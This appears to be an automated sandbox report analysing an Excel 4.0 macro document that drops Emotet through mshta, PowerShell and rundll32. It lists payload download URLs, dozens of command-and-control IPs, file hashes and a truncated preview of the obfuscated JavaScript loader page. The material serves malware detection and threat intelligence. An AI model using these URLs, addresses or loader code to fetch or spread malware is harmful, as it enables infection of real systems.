http://91.240.118.172/gg/ff/fe.htmlB	1162545482187818.xls.0.dr	true	Avira URL Cloud: safe	unknown
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://bimesarayenovin.ir/wp-admin/G1pYGL/	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.htmlE	mshta.exe, 00000004.00000002.443959880.00000000003CE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	powershell.exe, 00000006.00000002.684071106.0000000003846000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.154.133.20	unknown	France	12876	OnlineSASFR	true
185.157.82.211	unknown	Poland	42927	S-NET-ASPL	true
212.237.17.99	unknown	Italy	31034	ARUBA-ASNIT	true
79.172.212.216	unknown	Hungary	61998	SZERVERPLEXHU	true
110.232.117.186	unknown	Australia	56038	RACKCORP-APRackCorpAU	true
173.214.173.220	unknown	United States	19318	IS-AS-1US	true
212.24.98.99	unknown	Lithuania	62282	RACKRAYUABRakrejusLT	true
138.185.72.26	unknown	Brazil	264343	EmpasoftLtdaMeBR	true
178.63.25.185	unknown	Germany	24940	HETZNER-ASDE	true
160.16.102.168	unknown	Japan	9370	SAKURA-BSAKURAInternetIncJP	true
81.0.236.90	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true
103.75.201.2	unknown	Thailand	133496	CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH	true
216.158.226.206	unknown	United States	19318	IS-AS-1US	true
45.118.115.99	unknown	Indonesia	131717	IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID	true
51.15.4.22	unknown	France	12876	OnlineSASFR	true
159.89.230.105	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
162.214.50.39	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
103.206.244.105	jurnalpjf.lan.go.id	Indonesia	131111	CEPATNET-AS-IDPTMoraTelematikaIndonesiaID	false
200.17.134.35	unknown	Brazil	1916	AssociacaoRedeNacionaldeEnsinoePesquisaBR	true
217.182.143.207	unknown	France	16276	OVHFR	true
107.182.225.142	unknown	United States	32780	HOSTINGSERVICES-INCUS	true
51.38.71.0	unknown	France	16276	OVHFR	true
45.118.135.203	unknown	Japan	63949	LINODE-APLinodeLLCUS	true
50.116.54.215	unknown	United States	63949	LINODE-APLinodeLLCUS	true
131.100.24.231	unknown	Brazil	61635	GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR	true
46.55.222.11	unknown	Bulgaria	34841	BALCHIKNETBG	true
41.76.108.46	unknown	South Africa	327979	DIAMATRIXZA	true
173.212.193.249	unknown	Germany	51167	CONTABODE	true
45.176.232.124	unknown	Colombia	267869	CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC	true
178.79.147.66	unknown	United Kingdom	63949	LINODE-APLinodeLLCUS	true
212.237.5.209	unknown	Italy	31034	ARUBA-ASNIT	true
162.243.175.63	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
176.104.106.96	unknown	Serbia	198371	NINETRS	true
207.38.84.195	unknown	United States	30083	AS-30083-GO-DADDY-COM-LLCUS	true
164.68.99.3	unknown	Germany	51167	CONTABODE	true
164.90.147.135	hostfeeling.com	United States	14061	DIGITALOCEAN-ASNUS	true
192.254.71.210	unknown	United States	64235	BIGBRAINUS	true
212.237.56.116	unknown	Italy	31034	ARUBA-ASNIT	true
104.168.155.129	unknown	United States	54290	HOSTWINDSUS	true
45.142.114.231	unknown	Germany	44066	DE-FIRSTCOLOwwwfirst-colonetDE	true
203.114.109.124	unknown	Thailand	131293	TOT-LLI-AS-APTOTPublicCompanyLimitedTH	true
209.59.138.75	unknown	United States	32244	LIQUIDWEBUS	true
159.8.59.82	unknown	United States	36351	SOFTLAYERUS	true
129.232.188.93	unknown	South Africa	37153	xneeloZA	true
91.240.118.172	unknown	unknown	49453	GLOBALLAYERNL	true
58.227.42.236	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
158.69.222.101	unknown	Canada	16276	OVHFR	true
104.251.214.46	unknown	United States	54540	INCERO-HVVCUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	562434
Start date:	28.01.2022
Start time:	21:36:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1162545482187818.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@25/9@2/48
EGA Information:	Successful, ratio: 77.8%
HDC Information:	Successful, ratio: 32.4% (good quality ratio 27.2%) Quality average: 65.1% Quality standard deviation: 33.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 52 Number of non-executed functions: 197
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 92.123.101.187, 92.123.101.225, 92.123.101.218, 93.184.221.240
Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, wu-shim.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu.azureedge.net, download.windowsupdate.com.edgesuite.net
Execution Graph export aborted for target mshta.exe, PID 2564 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 2908 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:37:22	API Interceptor	62x Sleep call for process: mshta.exe modified
21:37:25	API Interceptor	446x Sleep call for process: powershell.exe modified
21:38:03	API Interceptor	84x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
195.154.133.20	364453688149503140239183.xls	Get hash	malicious	Browse
	CJ68000754184.xls	Get hash	malicious	Browse
	imedpub_2.xls	Get hash	malicious	Browse
	imedpub_6.xls	Get hash	malicious	Browse
	imedpub.com_6.xls	Get hash	malicious	Browse
	imedpub.com_10.xls	Get hash	malicious	Browse
	iMedPub LTD_10.xls	Get hash	malicious	Browse
	iMedPub LTD_12.xls	Get hash	malicious	Browse
	iMedPub LTD_14.xls	Get hash	malicious	Browse
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse
	iMedPub LTD_15.xls	Get hash	malicious	Browse
	iMedPub LTD_2.xls	Get hash	malicious	Browse
	iMedPub LTD_3.xls	Get hash	malicious	Browse
	iMedPub LTD_7.xls	Get hash	malicious	Browse
	iMedPub LTD_8.xls	Get hash	malicious	Browse
	imedpub.xls	Get hash	malicious	Browse
	InnovincConf_1.xls	Get hash	malicious	Browse
	innovinc.org.xls	Get hash	malicious	Browse
	ANFg7r0v2A.dll	Get hash	malicious	Browse
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse
185.157.82.211	364453688149503140239183.xls	Get hash	malicious	Browse
	CJ68000754184.xls	Get hash	malicious	Browse
	imedpub_2.xls	Get hash	malicious	Browse
	imedpub_6.xls	Get hash	malicious	Browse
	imedpub.com_6.xls	Get hash	malicious	Browse
	imedpub.com_10.xls	Get hash	malicious	Browse
	iMedPub LTD_10.xls	Get hash	malicious	Browse
	iMedPub LTD_12.xls	Get hash	malicious	Browse
	iMedPub LTD_14.xls	Get hash	malicious	Browse
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse
	iMedPub LTD_15.xls	Get hash	malicious	Browse
	iMedPub LTD_2.xls	Get hash	malicious	Browse
	iMedPub LTD_3.xls	Get hash	malicious	Browse
	iMedPub LTD_7.xls	Get hash	malicious	Browse
	iMedPub LTD_8.xls	Get hash	malicious	Browse
	imedpub.xls	Get hash	malicious	Browse
	InnovincConf_1.xls	Get hash	malicious	Browse
	innovinc.org.xls	Get hash	malicious	Browse
	ANFg7r0v2A.dll	Get hash	malicious	Browse
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
jurnalpjf.lan.go.id	CJ68000754184.xls	Get hash	malicious	Browse	103.206.244.105
	imedpub_6.xls	Get hash	malicious	Browse	103.206.244.105
	imedpub_8.xls	Get hash	malicious	Browse	103.206.244.105
	iMedPub LTD_7.xls	Get hash	malicious	Browse	103.206.244.105
	InnovincConf_1.xls	Get hash	malicious	Browse	103.206.244.105
	innovinc.org.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	103.206.244.105
	Innovincconferences.xls	Get hash	malicious	Browse	103.206.244.105
	Opast International.xls	Get hash	malicious	Browse	103.206.244.105
	iMedPub LTD.xls	Get hash	malicious	Browse	103.206.244.105
	opastonline.com.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing_1.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing_2.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing_6.xls	Get hash	malicious	Browse	103.206.244.105
	Insight Medical Publishing.xls	Get hash	malicious	Browse	103.206.244.105
	OMICS International.xls	Get hash	malicious	Browse	103.206.244.105
	SecuriteInfo.com.X97M.DownLoader.901.32695.xls	Get hash	malicious	Browse	103.206.244.105
	omicsonline.net.xls	Get hash	malicious	Browse	103.206.244.105
	OMICS Online_3.xls	Get hash	malicious	Browse	103.206.244.105
	OMICS Publishing Group.xls	Get hash	malicious	Browse	103.206.244.105
hostfeeling.com	CJ68000754184.xls	Get hash	malicious	Browse	164.90.147.135
	imedpub_6.xls	Get hash	malicious	Browse	164.90.147.135
	imedpub_8.xls	Get hash	malicious	Browse	164.90.147.135
	iMedPub LTD_7.xls	Get hash	malicious	Browse	164.90.147.135
	InnovincConf_1.xls	Get hash	malicious	Browse	164.90.147.135
	innovinc.org.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	164.90.147.135
	Innovincconferences.xls	Get hash	malicious	Browse	164.90.147.135
	Opast International.xls	Get hash	malicious	Browse	164.90.147.135
	iMedPub LTD.xls	Get hash	malicious	Browse	164.90.147.135
	opastonline.com.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing_1.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing_2.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing_6.xls	Get hash	malicious	Browse	164.90.147.135
	Insight Medical Publishing.xls	Get hash	malicious	Browse	164.90.147.135
	OMICS International.xls	Get hash	malicious	Browse	164.90.147.135
	SecuriteInfo.com.X97M.DownLoader.901.32695.xls	Get hash	malicious	Browse	164.90.147.135
	omicsonline.net.xls	Get hash	malicious	Browse	164.90.147.135
	OMICS Online_3.xls	Get hash	malicious	Browse	164.90.147.135
	OMICS Publishing Group.xls	Get hash	malicious	Browse	164.90.147.135

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
S-NET-ASPL	364453688149503140239183.xls	Get hash	malicious	Browse	185.157.82.211
	CJ68000754184.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub_2.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub_6.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub.com_6.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub.com_10.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_10.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_12.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_14.xls	Get hash	malicious	Browse	185.157.82.211
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_15.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_2.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_3.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_7.xls	Get hash	malicious	Browse	185.157.82.211
	iMedPub LTD_8.xls	Get hash	malicious	Browse	185.157.82.211
	imedpub.xls	Get hash	malicious	Browse	185.157.82.211
	InnovincConf_1.xls	Get hash	malicious	Browse	185.157.82.211
	innovinc.org.xls	Get hash	malicious	Browse	185.157.82.211
	ANFg7r0v2A.dll	Get hash	malicious	Browse	185.157.82.211
	Insight Medical Publishing_10.xls	Get hash	malicious	Browse	185.157.82.211
OnlineSASFR	AcqQhfewOu.dll	Get hash	malicious	Browse	195.154.146.35
	364453688149503140239183.xls	Get hash	malicious	Browse	51.15.4.22
	80_513972285.xls	Get hash	malicious	Browse	195.154.146.35
	Attachment-2801.xls	Get hash	malicious	Browse	195.154.146.35
	CJ68000754184.xls	Get hash	malicious	Browse	51.15.4.22
	DOCUMENT_2801.xls	Get hash	malicious	Browse	195.154.146.35
	DETAILS-145.xls	Get hash	malicious	Browse	195.154.146.35
	imedpub_2.xls	Get hash	malicious	Browse	51.15.4.22
	imedpub_6.xls	Get hash	malicious	Browse	51.15.4.22
	imedpub.com_6.xls	Get hash	malicious	Browse	51.15.4.22
	imedpub.com_10.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_10.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_12.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_14.xls	Get hash	malicious	Browse	51.15.4.22
	NZW-010122 BNUV-280122.xlsm	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_15.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_2.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_3.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_7.xls	Get hash	malicious	Browse	51.15.4.22
	iMedPub LTD_8.xls	Get hash	malicious	Browse	51.15.4.22

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\JooSee.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.980523500642122
Encrypted:	false
SSDEEP:	12288:B2AavzUBPSczbeeTLjvmyMwWd3DYr6i64/:OUBPSczbeeTnvaZDWA
MD5:	B7D87029FD2F630D32C4EAB8D3F0F0E3
SHA1:	8A8CECA8396C90EAC370F1DF71A612CF904A62E4
SHA-256:	5FC3491A82DD7C1FD1CCCB7AA13162493A84AC66FDE620AE8B4E220541DD4B87
SHA-512:	BEC8E0C3B2053293070D8E9ECE736F070A925A06875E12BCB9EADD9CB2C466468F941B563214E67CDB5009297AE088B3AF8BAB416C65138AC28B63F5B1533B1B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	downloaded
Size (bytes):	11054
Entropy (8bit):	6.200485074224619
Encrypted:	false
SSDEEP:	192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
MD5:	DD20B97330028BCB6BF98D97C47028D9
SHA1:	D58D97589A97FBD3B1216ED76C4918113F4B7B25
SHA-256:	4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
SHA-512:	AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
Malicious:	false
IE Cache URL:	http://91.240.118.172/gg/ff/fe.html
Preview:	.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode\|\|document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')\|lI1('per');f9f76c\|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}

C:\Users\user\AppData\Local\Temp\473D.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.1464700112623651
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
MD5:	72F5C05B7EA8DD6059BF59F50B22DF33
SHA1:	D5AF52E129E15E3A34772806F6C5FBF132E7408E
SHA-256:	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
SHA-512:	6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF36C327800F732AC5.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	3.5189161831469296
Encrypted:	false
SSDEEP:	768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
MD5:	06A30014EFAE12913C829BE85DD271EC
SHA1:	D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
SHA-256:	2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
SHA-512:	E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3E467E9CE6D414C1.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms.. (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5844298760279005
Encrypted:	false
SSDEEP:	96:chQCsMq+qvsqvJCwomz8hQCsMq+qvsEHyqvJCworczIyYbHFUVhxlUVoA2:c6Homz86rHnorczIXUVhhA2
MD5:	F027FF738FAD287E757A176EDE54A81B
SHA1:	52DB4CBE043DB43D773D8C8069D8556A6CF12886
SHA-256:	E4A5A90A44110838E6BDD5C96E5D1662C9D8A10C6676C677C2DF20DBD0BBF3BF
SHA-512:	68D3873ED6E4C09ADB5EE2F67752A7F2F86C39223BB4C178637B90F8C72DF7E511B18E139AF8A564E7F2BF63D8BA9F110F362E5ADEF607E95F129F8A537209FF
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S#...Programs..f.......:...S#....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AGKJQE95H0UNWDLV1KB1.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5844298760279005
Encrypted:	false
SSDEEP:	96:chQCsMq+qvsqvJCwomz8hQCsMq+qvsEHyqvJCworczIyYbHFUVhxlUVoA2:c6Homz86rHnorczIXUVhhA2
MD5:	F027FF738FAD287E757A176EDE54A81B
SHA1:	52DB4CBE043DB43D773D8C8069D8556A6CF12886
SHA-256:	E4A5A90A44110838E6BDD5C96E5D1662C9D8A10C6676C677C2DF20DBD0BBF3BF
SHA-512:	68D3873ED6E4C09ADB5EE2F67752A7F2F86C39223BB4C178637B90F8C72DF7E511B18E139AF8A564E7F2BF63D8BA9F110F362E5ADEF607E95F129F8A537209FF
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S#...Programs..f.......:...S#....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\1162545482187818.xls

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
Category:	dropped
Size (bytes):	86528
Entropy (8bit):	7.1002836482156075
Encrypted:	false
SSDEEP:	1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e35:g0k3hbdlylKsgqopeJBWhZFGkE+cMLx5
MD5:	4074E13305B0A3E8754156FEFBB4D749
SHA1:	59B56317AF4890B22078D63F617A2CB71FE536F4
SHA-256:	F6CDB262AD780D33A565E591C48D540808A4CBB693840F4BB00EA45A4B83AA33
SHA-512:	E07E2B10710DF033695CBDCF3C255E89CB9BF97C5718C83F891CC3DEA1E76F3483B993D0AB37E42D3765A20CD33B181CED2FF9DDF3A78D0CC89F3935170442F2
Malicious:	true
Yara Hits:	Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\1162545482187818.xls, Author: John Lambert @JohnLaTwC Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\1162545482187818.xls, Author: Joe Security
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.

C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb (copy)

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.980523500642122
Encrypted:	false
SSDEEP:	12288:B2AavzUBPSczbeeTLjvmyMwWd3DYr6i64/:OUBPSczbeeTnvaZDWA
MD5:	B7D87029FD2F630D32C4EAB8D3F0F0E3
SHA1:	8A8CECA8396C90EAC370F1DF71A612CF904A62E4
SHA-256:	5FC3491A82DD7C1FD1CCCB7AA13162493A84AC66FDE620AE8B4E220541DD4B87
SHA-512:	BEC8E0C3B2053293070D8E9ECE736F070A925A06875E12BCB9EADD9CB2C466468F941B563214E67CDB5009297AE088B3AF8BAB416C65138AC28B63F5B1533B1B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
Entropy (8bit):	7.0445553255542634
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	1162545482187818.xls
File size:	87556
MD5:	0a9833910735f0c8c9d663eb4a2b47ef
SHA1:	d273861b0b374857099a1556bf51626d56201472
SHA256:	c2829e1d302f93506778d37de2cd2b666ca891d095196ca4aa5345e5905f3721
